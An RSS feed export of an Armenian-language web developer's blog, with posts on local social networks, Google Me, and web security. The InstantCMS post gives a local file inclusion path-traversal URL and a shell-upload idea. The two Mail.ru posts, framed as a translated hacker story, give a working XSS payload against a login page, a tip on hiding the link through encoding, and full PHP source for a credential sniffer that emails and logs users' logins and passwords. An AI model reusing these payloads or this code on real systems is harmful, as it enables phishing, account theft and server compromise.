<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Blog of Vardan Grigoryan &#187; Մի կայքի պատմություն</title>
	<atom:link href="http://grigoryan.biz/blog/category/%d5%b4%d5%ab-%d5%af%d5%a1%d5%b5%d6%84%d5%ab-%d5%ba%d5%a1%d5%bf%d5%b4%d5%b8%d6%82%d5%a9%d5%b5%d5%b8%d6%82%d5%b6/feed/" rel="self" type="application/rss+xml" />
	<link>http://grigoryan.biz/blog</link>
	<description>Մի վեբ ծրագրավորողի բլոգ</description>
	<lastBuildDate>Mon, 30 Aug 2010 20:15:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>

   <image>
    <title>Blog of Vardan Grigoryan</title>
    <url>http://0.gravatar.com/avatar/4c04620d6c47da968076d22b9708921f?s=</url>
    <link>http://grigoryan.biz/blog</link>
   </image>
		<item>
		<title>Ուսումնասիրում ենք հայկականը</title>
		<link>http://grigoryan.biz/blog/2010/08/29/armenian-social-network-review/</link>
		<comments>http://grigoryan.biz/blog/2010/08/29/armenian-social-network-review/#comments</comments>
		<pubDate>Sat, 28 Aug 2010 21:24:15 +0000</pubDate>
		<dc:creator>Vardan Grigoryan</dc:creator>
				<category><![CDATA[Խորհուրդներ]]></category>
		<category><![CDATA[Հոդվածներ]]></category>
		<category><![CDATA[Մի կայքի պատմություն]]></category>
		<category><![CDATA[Մտորումներս]]></category>
		<category><![CDATA[boonex]]></category>
		<category><![CDATA[dolphin cms]]></category>
		<category><![CDATA[myfriends]]></category>
		<category><![CDATA[social network]]></category>
		<category><![CDATA[սոցիալական ցանց]]></category>

		<guid isPermaLink="false">http://grigoryan.biz/blog/?p=455</guid>
		<description><![CDATA[Գրառումներից մեկի կարծիքների մեջ Վահագի առաջարկով փորձեցի ուսումնասիրել MyFriends.am հայակական սոցիալական ցանցը: Ահա ներկայացնում եմ մտորումներս. Ուրեմն սկսեմ նրանից, որ կայքը կառուցված է BoonEx ընկերության կողմից ստեղծված Dolphin համակարգի վրա, որն ի դեպ ունի մի քանի տարբերակներ` անվճար և լիցենզավորված: Լիցենզավորված տարբերակի ընդմիշտ լիցենզիան արժե 300$: Սա այդքան էլ մեծ գումար չէ, եթե իհարկե ցանց [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://grigoryan.biz/blog/wp-content/uploads/2010/08/1280701576.png"><img class="alignleft size-full wp-image-483" title="1280701576" src="http://grigoryan.biz/blog/wp-content/uploads/2010/08/1280701576.png" alt="" width="250" height="65" /></a>Գրառումներից <a href="http://grigoryan.biz/blog/2009/12/19/armenian-social-networks/" target="_blank">մեկի</a> կարծիքների մեջ Վահագի առաջարկով փորձեցի ուսումնասիրել MyFriends.am հայակական սոցիալական ցանցը: Ահա ներկայացնում եմ մտորումներս.</p>
<p>Ուրեմն սկսեմ նրանից, որ կայքը կառուցված է BoonEx ընկերության կողմից ստեղծված Dolphin համակարգի վրա, որն ի դեպ ունի մի քանի տարբերակներ` անվճար և լիցենզավորված: Լիցենզավորված տարբերակի ընդմիշտ լիցենզիան արժե 300$: Սա այդքան էլ մեծ գումար չէ, եթե իհարկե ցանց արդարացնի սպասումները: Ինչևէ, MyFriends.am կայքում չտեսա դեպի այդ ընկերություն տանող հետադարձ հղում, որը հուշում է լիցենզիայի գոյության մասին: Ինչու եմ սրա մասին գրում, որովհետև եթե համակարգը լիցենզավորված է, ուրեմն անվտանությունն ինչ-որ չափով ապահովվում է լիցենզավորող կազմակերպությունը: Բայց&#8230; MyFriends.am կայքի առաջին էջը, բավականին տարբերվում էր  BoonEx-ի կողմից ցուցադրվող դեմո տարբերակի առաջին էջից: Ասեմ ավելին` դեմո տարբերակի դիզայնը բավականին հաջող էր: Ներկայացնեմ երկու պատկեր, ինքներդ համոզվեք.<span id="more-455"></span></p>
<p><a rel="lightbox-a1" href="http://grigoryan.biz/blog/wp-content/uploads/2010/08/1-11.jpg"><img class="size-full wp-image-461 alignnone" title="1-1" src="http://grigoryan.biz/blog/wp-content/uploads/2010/08/1-11.jpg" alt="" width="600" height="107" /></a></p>
<p><a rel="lightbox-a1" href="http://grigoryan.biz/blog/wp-content/uploads/2010/08/1-2.jpg"><img class="alignnone size-full wp-image-457" title="1-2" src="http://grigoryan.biz/blog/wp-content/uploads/2010/08/1-2.jpg" alt="" width="600" height="111" /></a></p>
<p>Ուշադրություն դարձրեք կարմիր օվալի մեջ առած հատվածները` երկու նկարներում էլ գրված են նույն տառաչափով, բայց հայերենում դրանք գրեթե չեն կարդացվում: Սա առաջին թերությունն է, որ նկատել եմ: Ընդ որում` թերությունը Arian AMU տառատեսակի մեջ է, որը գրված է MyFriends.am կայքի CSS-ում:</p>
<p>Նկարում երևում է նաև, որ BoonEx-ի դեմո տարբերակում վերևի նավիգացիայում բավականին շատ մենյուներ կան, իսկ MyFriends.am-ում դրանք չգիտես ինչու` բացակայում են: Առաջին հայացքից թվում է, թե MyFriends-ը Dolphin-ի անվճար տարբերակի հիման վրա է, որի պատճառով էլ բավականին ֆունկցիաներ պակասում են, կամ գուցե մերոնք չեն օգտվում համկարգի 7-րդ տարբերակից /ինձ թվում է արժե անցնել այս տարբերակին/:</p>
<p>Անցնենք առաջ և գրանցվենք կայքում: Գրանցումը ավելի քան պարզ է, հեշտ և ԱՆՎՃԱՐ: Սրանք շատ կարևոր առավելություններ են ցանցի համար:</p>
<p>Ահա և ցանցի ներսում ենք: Այստեղ կարծես թե ամեն ինչ արդեն հասկանալի է: Գրանցված անդամն իրավունք ունի.</p>
<ol>
<li>Ստանալ և ուղարկել նամակներ,</li>
<li>Ընկերանալ մարդկանց հետ,</li>
<li>Գնահատել մարդկանց նկարները,</li>
<li>Ջերմ ողջունել մեկ հղումով,</li>
<li>Ինչ-որ մեկին դարձնել իր համար սիրելի /ֆավորիտ/,</li>
<li>Բողոքել ինչ-որ մեկի մասին,</li>
<li>Դիտել այլ գրանցված անդամի էլ. փոստը /սա չհասկացա ինչ ֆունկցիա է, բայց կարծես չի աշխատում/,</li>
<li>Հրավիրել ուրիշներին այդ կայքում գրանցվելու համար,</li>
<li>Տեղադրել նկարներ, տեսանյութեր և մեղեդիներ,</li>
<li>Չատով խոսել իր ընկերների հետ,</li>
<li>Ստեղծել օրագիր:</li>
</ol>
<p>Ահա այս ամենը նա կարող է անել անվճար, և կարծես թե` անսահմանափակ քանակությամբ /համենայն դեպս ոչ մի տեղ վճարովի ծառայություն կամ սահմանափակում չտեսա, բացի  վերը նշված 7-րդ կետի ԴԻՏԵԼ ԷԼ.ՓՈՍՏԸ ֆունկցիայից/:</p>
<p>Ընդհանուր առմամբ համակարգը լավն է, բայց ինձ իրավունք վերապահեմ անել մի քանի դիտողություններ մեր MyFriends-ին.</p>
<ul>
<li>Խորհուրդ կտամ անցնել Dolphin 7-ին, որովհետև այն ավելի գեղեցիկ է,</li>
<li>Եթե համակարգի մի մասը web 2.0 է, ապա լավ կլինի ամբողջությամբ անցնել այդ տեխնոլոգիային,</li>
<li>Նկատի ունենալ <a rel="lightbox" href="http://grigoryan.biz/blog/wp-content/uploads/2010/08/2.jpg">ԱՅՍ</a> նկարում նշված թերությունները,</li>
<li>http://myfriends.am/modules/?r=&#8217; , հղումը վտանգավոր է անվտանգության համար, ուսումնասիրեք r փոփոխականի մուտքային տվյալների ստուգումը,</li>
<li>Ընդհանրապես հետևել բոլոր մոդուլների աշխատող ֆայլերի մուտքային տվյանլների ստուգումներին, դա շատ կարևոր է:</li>
</ul>
<p>Մնացած ամեն ինչով համակարգը լավն է:</p>
<p>Հ.Գ. Ափսոս ոչ մի տեղ չգտա գրանցված անդամների քանակի վերաբերյալ ինֆորմացիա:</p>
]]></content:encoded>
			<wfw:commentRss>http://grigoryan.biz/blog/2010/08/29/armenian-social-network-review/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Գուգլի&#8217;ր ինձ&#8230;</title>
		<link>http://grigoryan.biz/blog/2010/08/18/google-me/</link>
		<comments>http://grigoryan.biz/blog/2010/08/18/google-me/#comments</comments>
		<pubDate>Wed, 18 Aug 2010 05:46:18 +0000</pubDate>
		<dc:creator>Vardan Grigoryan</dc:creator>
				<category><![CDATA[Դեսից Դենից]]></category>
		<category><![CDATA[Հոդվածներ]]></category>
		<category><![CDATA[Մի կայքի պատմություն]]></category>
		<category><![CDATA[Մտորումներս]]></category>
		<category><![CDATA[facebook]]></category>
		<category><![CDATA[google me]]></category>
		<category><![CDATA[zynga]]></category>
		<category><![CDATA[մրցակցություն]]></category>
		<category><![CDATA[սոցիալական ցանց]]></category>

		<guid isPermaLink="false">http://grigoryan.biz/blog/?p=445</guid>
		<description><![CDATA[Սոցիալական ցանցերով լեցուն համացանցը շուտով պատրաստվում է ընդունել ևս մեկ գերհսկայի` Google Me անունով: Բայց ներկա պահին արդեն բավականին մեծ համբավ ունեցող facebook-ի հետ մրցակցության մեջ մտնելու համար, իմ կարծիքով գուգլը պետք է իր բոլոր ռեսուրսներն ուղղի դեպի Me-ն: Գուցե շատ-շատերը համատեղեն Ֆեյսբուքն ու ԳուգլՄի-ն միայն նրա համար, որ վերջինս հանրահայտ Գուգլ ընկերությանն է պատկանում: [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://grigoryan.biz/blog/wp-content/uploads/2010/08/google-me.jpg"><img class="alignleft size-full wp-image-446" style="margin-top: 2px; margin-bottom: 2px; margin-left: 5px; margin-right: 5px;" title="google-me" src="http://grigoryan.biz/blog/wp-content/uploads/2010/08/google-me.jpg" alt="" width="130" height="93" /></a>Սոցիալական ցանցերով լեցուն համացանցը շուտով պատրաստվում է ընդունել ևս մեկ գերհսկայի` Google Me անունով: Բայց ներկա պահին արդեն բավականին մեծ համբավ ունեցող facebook-ի հետ մրցակցության մեջ մտնելու համար, իմ կարծիքով գուգլը պետք է իր բոլոր ռեսուրսներն ուղղի դեպի Me-ն: Գուցե շատ-շատերը համատեղեն Ֆեյսբուքն ու ԳուգլՄի-ն միայն նրա համար, որ վերջինս հանրահայտ Գուգլ ընկերությանն է պատկանում: Բայց այդպիսի մարդկանց քանակությունը շատ քիչ կլինի մրցակցությանը դիմանալու համար:</p>
<p>Շատ կարևոր է մարդկանց մոտ արդեն ձևավորված սովորությունները պահպանել: Այսինքն Me-ն ստիպված պետք է պարունակի Facebook-ի որոշակի շատ կարևոր տարրեր:</p>
<p>Այս ամենին հավելյալ պետք է նորարարություններ շատ լինեն, ու ամենակարևորը` անհրաժեշտ ու հետաքրքիր նորարություններ: Հակառակ դեպքում հենց այդ նորարարությունները կարող են վանել մարդկանց: Հենց այս պատճառով էլ Գուգլը վերջերս գնել է օնլայն խաղերի վճարման համակարգեր ստեղծող Jambool ընկերությունը: Իսկ դրանից առաջ արդեն գնել էր հանհրահայտ Slide և Zynga ընկերությունները, որոնք նախկինում Facebook-ի համար էին խաղեր պատրաստում: Այս ամենը, իհարկե, որոշակի չափով կկոտրի Facebook-ի առաջընթացը, բայց ամենամեծ վնասը, որ կարող է կրել Facebook-ը, որոնողական համակարգերում բարձր տեղերը զիջելն է: Ամենայն հավանականությամբ Me-ի ստեղծումից հետո որոնումների ժամանակ առաջին տեղերում կլինեն Me-ի պրոֆիլները, հետո նոր Facebook-ինը:</p>
<p>Չնայած Գուգլի` Twitter-ի հետ մրցակցության մեջ մտնելու փորձն այդքան էլ չհաջողվեց, այնուամենայնիվ սոցիալական ցանցի դեպքում, իմ կարծիքով Գուգլն ունի բոլոր հնարավարությունները դաշտում մրցակցություն և հետաքրքրություն մտցնելու համար:</p>
<p>Դե ինչ, մեզ մնում է միայն սպասել Me-ին` հույս ունենալով, որ գոնե այնտեղ Быстрое Щелкание-ի նման անիմաստ բաներ չեն լինի:</p>
]]></content:encoded>
			<wfw:commentRss>http://grigoryan.biz/blog/2010/08/18/google-me/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Սոցիալական ցա՞նց, թե՞ &#8220;անթերի&#8221; սկրիպտ &#8211; մաս 1</title>
		<link>http://grigoryan.biz/blog/2010/04/27/social-network-or-bad-script/</link>
		<comments>http://grigoryan.biz/blog/2010/04/27/social-network-or-bad-script/#comments</comments>
		<pubDate>Tue, 27 Apr 2010 18:48:24 +0000</pubDate>
		<dc:creator>Vardan Grigoryan</dc:creator>
				<category><![CDATA[Մի կայքի պատմություն]]></category>
		<category><![CDATA[instantcms]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[հաքեր]]></category>
		<category><![CDATA[ուռա]]></category>
		<category><![CDATA[սկրիպտ]]></category>

		<guid isPermaLink="false">http://grigoryan.biz/blog/?p=300</guid>
		<description><![CDATA[Ինտերնետ օգտվողների կողմից օրեցօր աճող պահանջարկ ունեցող սոցիալական ցանցերն այնքան մեծ տարածում են արդեն գտել, որ շատ-շատերը երազում են ունենալ իրենց սեփական սոցիալական ցանցը&#8230; Դու նույնպես&#8230; Չէ՞&#8230; Եվ ահա այդ շատ ցանկացողների համար էլ ստեղված է մի համակարգ (այսուհետ կանվանեմ սկրիպտ), որը կոչվում է InstantCMS: Գուցե շատերին անունը ոչինչ չասեց, բայց որոշներին հաստատ ծանոթ սկրիպտ [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://grigoryan.biz/blog/wp-content/uploads/2010/04/instantcms.jpg"><img class="alignleft size-medium wp-image-310" title="instantcms" src="http://grigoryan.biz/blog/wp-content/uploads/2010/04/instantcms-300x143.jpg" alt="" width="300" height="143" /></a>Ինտերնետ օգտվողների կողմից օրեցօր աճող պահանջարկ ունեցող սոցիալական ցանցերն այնքան մեծ տարածում են արդեն գտել, որ շատ-շատերը երազում են ունենալ իրենց սեփական սոցիալական ցանցը&#8230; Դու նույնպես&#8230; Չէ՞&#8230;</p>
<p>Եվ ահա այդ շատ ցանկացողների համար էլ ստեղված է մի համակարգ (այսուհետ կանվանեմ <strong>սկրիպտ</strong>), որը կոչվում է <strong>InstantCMS</strong>: Գուցե շատերին անունը ոչինչ չասեց, բայց որոշներին հաստատ ծանոթ սկրիպտ է: Փորձեմ այսօր անդրադառնալ այս սկրիպտի թերություններին:</p>
<p><strong>ՆԱԽԱՀԱՐՁԱԿՈՒՄ</strong></p>
<p>Ահա գտել եմ այդ սկրիպտով աշխատող ինչ-որ կայք, որի բախտը ցավոք չի բերել: Հիմա կփորձենք ստուգել&#8230;</p>
<p>Առաջինը, որ աչքի ընկավ, Ադմինիստրացիոն բաժնի ակներև տեղադրություն էր` <strong>http://badsite.com/admin</strong> : Ոնց էլ չլինի, եթե ուրիշ բան չգտնեմ, էտ հաստատ ասելու բանա&#8230; Ու քանի գնում ավելի էր ձգում ինձ սկրպիտը&#8230;</p>
<p>Գուգլն ինձ ասաց, որ սկրիպտի պաշտոնական սայթը instantcms.ru-ն էր&#8230; Ես էլ գնացի ու &#8230; 2 Մեգաբիթանոց կապս սկրիպտը շատ արագ տեղավորեց համակարգչիս կոշտ սկավառակի ամենաակնառու տեղը` ուղիղ էկրանիս&#8230;<span id="more-300"></span><strong>ԻՆՁ ԿԱՆԱՉ ՃԱՆԱՊԱՐՀ</strong></p>
<p>Լոկալ սերվերիս վրա միացրեցի apache-ն ու mysql-ը, սկրիպտը տեղավորեցի համապատասխան տեղում ու սկեսեցի փորփրել կոդը: Առաջինը որ տեսա ու աչքերս փայլատակեցին, դա wysiwyg անունով ֆայլերի արկղն էր (այսուհետ` ֆոլդեր), որի մեջ ինձ քաջ ծանոթ FCKeditor-ը աչքով էր անում, ասում էր &#8220;Ես այստեղ եմ&#8230;Ա~ու&#8230;&#8221;: Կհարցնեք ինչի էդքան ուրախացա, կասեմ, որ այդ editor-ն ամենալավ օգնականն է, եթե սկրիպտի մեջ լոկալ ինկլուդի թերություն կա: Ավելի մանրամասն.</p>
<blockquote><p><code>http://localhost/wysiwyg/editor/filemanager/connectors/test.html</code></p></blockquote>
<p>հասցեում գտնվում է ֆայլ-վերբեռնելու էջը, ու չնայած այն բանի, որ .php, .phtml, .cgi և այլ նմանատիպ ֆորմատներով ֆայլեր չենք կարողանա վերբեռնել, բայց եթե LFI-ն կա, ուրեմն ցանկացած ֆորմատի ֆայլ կարող ենք որպես php-կոդ աշխատեցնել: Բայց հակված եմ ավելի շատ ընդունել, որ նման թերությունը ոչ թե տեստավորվող սկրիպտի, այլ հենց FCKeditor-ի թերությունն է:</p>
<p>Ու քանի որ, ամեն ինչ աշխատում էր mod_rewrite-ով, որոշեցի .htaccess-ի մեջ քիթս խոթել մի քիչ ու գտա հետաքրքիր կոդ`</p>
<blockquote><p><code>#COMPONENT "RSS FEEDS"<br />
RewriteRule ^rss/([a-z]*)/(.*)/feed.rss$  /components/rssfeed/frontend.php?&amp;target=$1&amp;item_id=$2</code></p></blockquote>
<p>SQL-ինյեկցիա գտնելու հույսով գնացինք ուսումնասիրելու frontend.php-ն: Ներկայացնում եմ կոդ, որը ինձ դուր եկավ առաջին հայացքից.</p>
<pre class="brush:php">    if (isset($_REQUEST['do'])){ $do = $_REQUEST['do']; } else { $do = 'rss'; }
    if (isset($_REQUEST['target'])){ $target = $_REQUEST['target']; } else { die(); }
    if (isset($_REQUEST['item_id'])) { $item_id = $_REQUEST['item_id']; } else { die(); }
    .................................................. .....................................
    if ($do=='rss'){
    $rss = '';

    if (file_exists($_SERVER['DOCUMENT_ROOT'].'/components/'.$target.'/prss.php')){

    $inCore-&gt;includeFile('components/'.$target.'/prss.php');</pre>
<p>Ուռա&#8230; $target փոփոխականը Local File Inclusion-ի հարվածի տակ ա &#8230; աչքիս&#8230; երևի&#8230; <img src='http://grigoryan.biz/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Եթե PHP-ի կոնֆիգուրացիայի մեջ magic_quotes_gpc = off պայմանը կա, ուրեմն միանշանակ կարող ենք ցանկացաց ֆայլ ինկլուդ անել ահա այսպես`</p>
<blockquote><p><code>http://localhost/components/rssfeed/frontend.php?item_id=1  &amp;target=../../../../../../../../../../../../etc/hosts%00</code></p></blockquote>
<p>Դե եթե սրա հետ մեկտեղ հիշենք մի քիչ առաջ ասածս, որ FCKeditor-ի  օգնությամբ կարող ենք վերբեռնել ֆայլը, ուրմեն SHELL-ը հաստատ կուղարկվի հոսթինգ (բայց միմիայն ցանկության դեպքում): Դե իսկ, եթե հանկարծ ադմինիստրատորը editor-ի ֆայլ վեռբեռնելու մասը անջատել է, ծայրահեղ դեպքում կոդ-ավատարը կա ու կա:</p>
<p>&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;..</p>
<p>Հոգնեցի&#8230; շարունակությունը մի քիչ հետո կգրեմ&#8230;.</p>
]]></content:encoded>
			<wfw:commentRss>http://grigoryan.biz/blog/2010/04/27/social-network-or-bad-script/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Mail.ru – Անհնարին ոչինչ չկա – օր երկրորդ</title>
		<link>http://grigoryan.biz/blog/2009/09/29/mail-ru-nothing-imposible2/</link>
		<comments>http://grigoryan.biz/blog/2009/09/29/mail-ru-nothing-imposible2/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 05:36:31 +0000</pubDate>
		<dc:creator>Vardan Grigoryan</dc:creator>
				<category><![CDATA[Մի կայքի պատմություն]]></category>

		<guid isPermaLink="false">http://grigoryan.biz/blog/?p=53</guid>
		<description><![CDATA[- &#8211; - նյութի սկիզբը կարող եք կարդալ այստեղ &#8211; - - [օր երկրորդ...] Հաջորդ օրը (ավելի ճիշտ հենց նույն օրը, քանի որ օրն արդեն փոխվել էր) ասկա-իս վրա նամակ եկավ pixcher-ից: Նա սարքել էր ֆիկտիվ ֆորման ու տեղադրել “թունավոր” հասցեում` http://talk.mail.ru/login.html?target=&#8221;&#62;&#60;script&#62;location.href=&#8217;Վերահասցեավորում դեպի ֆիկտիվ ֆորմա&#8217;&#60;/script&#62; Բայց այս վիճակում հղումս ահավոր վախենալու և բացահայտ տեսք ուներ, [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-52" style="border: 0pt none; margin: 5px 10px;" title="mail.ru" src="http://grigoryan.biz/blog/wp-content/uploads/2009/09/mail.ru1.jpg" alt="mail.ru" width="206" height="166" /></p>
<p>- &#8211; - նյութի սկիզբը կարող եք կարդալ <a href="http://grigoryan.biz/blog/2009/09/28/mail-ru-nothing-imposible/">այստեղ</a> &#8211; - -</p>
<p><strong>[</strong><strong>օր</strong><strong> </strong><strong>երկրորդ...]</strong></p>
<p>Հաջորդ օրը (ավելի ճիշտ հենց նույն օրը, քանի որ օրն արդեն փոխվել էր) ասկա-իս վրա նամակ եկավ pixcher-ից: Նա սարքել էր ֆիկտիվ ֆորման ու տեղադրել “թունավոր” հասցեում`</p>
<p><span style="color: #993300;">http://talk.mail.ru/login.html?target=&#8221;&gt;&lt;script&gt;location.href=&#8217;Վերահասցեավորում դեպի ֆիկտիվ ֆորմա&#8217;&lt;/script&gt;</span></p>
<p>Բայց այս վիճակում հղումս ահավոր վախենալու և բացահայտ տեսք ուներ, ու մենք մի քիչ այն դիմակավորեցինք, որպեսզի յուզերները ոչ մի գալիք վտանգ չզգան: Արդյունքում ստացանք ահա սա`</p>
<p><span style="color: #993300;">http://talk.mail.ru/login.html?targe&#8230;72%69%70%74%3e</span></p>
<p>Հաջորդ քայլում արդեն գրեցինք մի փոքրիկ սնիֆֆեր, որը ստանում էր իրեն փոխանցված տվյալները, գրում ֆայլի մեջ, իսկ վերջում յուզերին “շպրտում” իր փոստարկղ: Ահա սնիֆֆերիս կոդը`</p>
<p><span style="color: #993300;">&lt;?<br />
$adminmail = &#8220;mymail@mail.ru&#8221;;<br />
function email($to,$mailtext) {<br />
mail($to,&#8217;password&#8217;,$mailtext,$adminmail);<br />
}<br />
$text=&#8221;[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n&#8221;;<br />
email($adminmail,$text);<br />
$file = fopen(&#8220;logs.txt&#8221;,&#8221;a&#8221;);<br />
flock($file,3);<br />
fputs($file, $text);<br />
flock($file,1);<br />
fclose($file);</span></p>
<p><span style="color: #993300;">echo &#8220;&lt;FORM id=&#8217;auth&#8217; action=&#8217;http://talk.mail.ru/login.html&#8217; method=post&gt;<br />
&lt;INPUT value=&#8217;$_POST[login]&#8216;&gt;<br />
&lt;INPUT value=&#8217;$_POST[pass]&#8216;&gt;<br />
&lt;script&gt;auth.submit();&lt;/script&gt;<br />
&lt;/FORM&gt;&#8221;;<br />
?&gt;</span></p>
<p>Ուշադրություն դարձրեք, թե ինչպես է յուզերը մտնում իր փոստարկղ (տող 17)`</p>
<p><span style="color: #993300;">&lt;script&gt;auth.submit();&lt;/script&gt;</span></p>
<p>Ֆիկտիվ էջի (այսուհետ` ֆեյկ) պատրաստման գործընթացն էդքան էլ դժվար չէ, ֆայլը պահում ենք մեր կոմպի վինչի մեջ, իսկ form տեգի action փոփոխականը ռեդիռեկտ ենք անում: Արդյունքում, յուզերի կողմից մուտքագրված տվյալները գրվում են իմ ֆայլի մեջ, իսկ ինքը կտեղափոխվի փոստարկղ, ու կմտածի, որ DNS-ի խնդիր էր տեղի ունեցել կայքում&#8230;</p>
<p>- &#8211; - <span style="color: #ffffff;"><em>Շարունակելի</em></span> &#8211; - -</p>
]]></content:encoded>
			<wfw:commentRss>http://grigoryan.biz/blog/2009/09/29/mail-ru-nothing-imposible2/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Mail.ru &#8211; Անհնարին ոչինչ չկա &#8211; օր առաջին</title>
		<link>http://grigoryan.biz/blog/2009/09/28/mail-ru-nothing-imposible/</link>
		<comments>http://grigoryan.biz/blog/2009/09/28/mail-ru-nothing-imposible/#comments</comments>
		<pubDate>Mon, 28 Sep 2009 18:32:37 +0000</pubDate>
		<dc:creator>Vardan Grigoryan</dc:creator>
				<category><![CDATA[Մի կայքի պատմություն]]></category>

		<guid isPermaLink="false">http://grigoryan.biz/blog/?p=41</guid>
		<description><![CDATA[Այն ինչ գրում եմ, պարզապես ներկայացնում եմ մի հակերի պատմությունը` իր իսկ նկարագրությամբ: Նյութի մեջ առկա տեղեկատվությունը միտված է ընթերցողներին զգուշացնելուն: Նյութի հետևանքների համար ես ՊԱՏԱՍԽԱՆԱՏՈՒ չեմ&#8230; Նյութը հասկանալու համար պետք է գոնե մի քիչ գիտելիքներ ունենաք sql-ինյեկցիաների և XSS հարձակումների մասին: Հասկանալի՞ է&#8230; ուրեմն գնացին: Հիշեցնեմ որ պատմությունը պատմվում է հենց այդ մարդու կողմից, [...]]]></description>
			<content:encoded><![CDATA[<p><strong><img class="alignleft size-full wp-image-42" style="border: 0pt none; margin: 5px 10px;" title="mail.ru" src="http://grigoryan.biz/blog/wp-content/uploads/2009/09/mail.ru.jpg" alt="mail.ru" width="201" height="162" /></strong></p>
<p>Այն ինչ գրում եմ, պարզապես ներկայացնում եմ մի հակերի պատմությունը` իր իսկ նկարագրությամբ: Նյութի մեջ առկա տեղեկատվությունը միտված է ընթերցողներին զգուշացնելուն: Նյութի հետևանքների համար ես ՊԱՏԱՍԽԱՆԱՏՈՒ չեմ&#8230; Նյութը հասկանալու համար պետք է գոնե մի քիչ գիտելիքներ ունենաք sql-ինյեկցիաների և XSS հարձակումների մասին:</p>
<p>Հասկանալի՞ է&#8230; ուրեմն գնացին: Հիշեցնեմ որ պատմությունը պատմվում է հենց այդ մարդու կողմից, իսկ ես միայն թարգմանում եմ..</p>
<p><strong>[օր առաջին...]</strong></p>
<p>Գիշերվա երկուսն է, ես արդեն պատրաստվում էի քնել, բայց որոշեցի նախքան քնելը ստուգել էլ.փոստս: Մտնելով փոստարկղս  (ես գրանցված եմ մեյլ.ռու-ում), տեսա շատ մեծ քանակությամբ սպամ-նամակներ:  Գրողի տարած անտի-սպամ, աշխատում է գրեթե անարդյունք ու զզվել կարելի է: Իսկ առջևում Նոր Տարի է, և կարծես թե հենց մեյլ.ռու-ն ինձ &#8220;սպամ-նվերներ&#8221; էր մատուցել: Վերջապես ամոթ ա, արի ես էլ նվեր մատուցեմ &#8220;շատ սիրելի&#8221; փոստային համակարգիս:</p>
<p>Բայց արի ու տես, որ ինչքան էլ քրքեցի սրանց համակարգը, ոչ մի բաց չգտա: Դե ինչ, էստեղ հույս ունեմ կօգնի շատ սիրելի գուգլը: Դե քանի որ մեյլ.ռու-ն ունի շատ այլ ծառայություններ, գուցե հենց դրանց մեջ բաց տեղեր կան, և ես որոնման հարցումս ձևակերպեցի այսպես`  <strong>&#8220;site:*mail.ru&#8221;</strong> :  Ի պատասխան դրան, հարգարժան գուգլն իմ առջև բացեց հղումների 20 էջեր (բախտս բերեց դրանց կեսը կրկնվում էին, այլապես հոգեբուժարանում կլինեի հիմա): Լցրեցի սիրելի մեծ բաժակս սուրճով և սկսեցի ստուգել սերվիսները: Ինչքան էլ  զարմանալի լիներ ինձ համար, բայց մեյլ.ռու-ի վեբ կոդեր-ները լավ էին աշխատել, քանի որ 2 ժամանոց աուդիտից հետո ես ոչ մի բաց չէի գտել նրանց կոդի մեջ: Այդ պահի դրությամբ շտկվել էին որոշ թերություններ 7ya.mail.ru սերվիսի աշխատանքում, նկարները դիտելու ժամանակ բացվում էր popup պատուհան, հիշելով հետևյալ հասցեն`</p>
<p><span style="color: #800000;">http://7ya.mail.ru/image.php?in=phot&#8230;=500&amp;big_h=375</span></p>
<p>Ես որոշեցի այն մի քիչ տեսքի բերել և ստացվեց ահա այսպիսի գեղեցկուհի`</p>
<p><span style="color: #800000;">http://7ya.mail.ru/image.php?in=&#8221;&gt;&lt;font color=ORANGE size=10&gt;Russian Net Hunters &#8211; Rulezzz&lt;/font&gt;</span></p>
<p>Ինչպես տեսնում ես, ստացվեց &#8211; Russian Net Hunters Rulezzz. Դե իսկ մեյլ.ռու-ի վերջին սերվիսներից մեկը  форумы@mail.ru-ն էր: Առաջինը, որ փորձեցի, sql-ինյեկցիան էր, որն իհարկե ոչ մի արդյունք չտվեց, իսկ համակարգն ինձ ռեդիռեկտով դուրս շպրտեց մի էջի վրա, որտեղ գրված էր, որ ես գրանցված չեմ: Բայց այստեղ ուշադրությունս գրավեց շատ հետաքրքիր մի տող`</p>
<p><span style="color: #800000;">http://talk.mail.ru/login.html?target=</span></p>
<p>Փորձեցի ստուգել target փոփոխականը XSS-ի տեսանկյունից և բրաուզերիս մեջ հավաքեցի`</p>
<p><span style="color: #800000;">http://talk.mail.ru/login.html?target=&#8221;&gt;&lt;script&gt;alert();&lt;/script&gt;</span></p>
<p>Շատ զարմացա և ուրախացա երբ իմ առջև դուրս թռավ պատուհան, որը նշանակում էր, որ target փոփոխականը ոչ մի ֆիլտրացիա չի անցնում: Ըհը~&#8230; ՈՒրեմն որոշված է, սարքում եմ համակարգ մուտք գործելու ֆիկտիվ էջ, որպեսզի յուզերներն իրենք իրենց ձեռքով ինձ ուղարկեն գաղտնաբառերը: Առավոտվա ժամը 5-ն էր,և նույնիսկ 5 բաժակ սուրճից հետո ահավոր քնել էի ուզում (իսկ ավելի շատ զուգարանի կարիք ունեի): Այդ պատճառով խնդրեցի իմ լավ ընկեր pixcher-ին շարունակել իմ սկսած գործը:</p>
